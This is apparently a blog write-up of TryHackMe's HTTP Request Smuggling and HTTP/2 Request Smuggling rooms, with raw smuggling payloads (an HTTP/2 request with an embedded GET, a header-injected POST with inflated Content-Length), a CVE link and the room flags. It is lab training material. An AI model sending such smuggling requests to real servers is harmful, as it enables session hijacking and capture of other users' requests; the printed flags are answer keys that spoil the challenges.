
Tuesday is here, and we are on to the last section of the Web Application Pentesting pathway: today we are taking on HTTP Request Smuggling on THM!


























http://httprequestsmuggling.thm/submissions/

Flag – THM{1c4N_$mU66l3!!}
(I ran this attack four times and it seemed very scuffed)


We now move on to the HTTP/2 Request Smuggling room!














POST / HTTP/2
Host: 10.10.231.117:8000
Cookie: sessid=ba89f897ef7f68752abc
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 0

GET /post/like/12315198742342 HTTP/1.1
X: f



Flag – THM{my_name_is_a_flag}


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19330







bar
Host:10.10.224.226:8100
POST /hello HTTP/1.1
Content-Length: 300
Host: 10.10.224.226:8100
Content-Type:application/x-www-form-urlencoded
q=
(Note – SHIFT + ENTER for \r\n in inspector mode)


Flag – THM{not_secret_anymore}





Flag – THM{staff_only}






curl -kv https://10.10.224.226:8100/static/text.js

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"

This last question is giving me some aggro, so we will continue on with this tomorrow!


Until next time & don’t sleepwalk through life!
Xayr
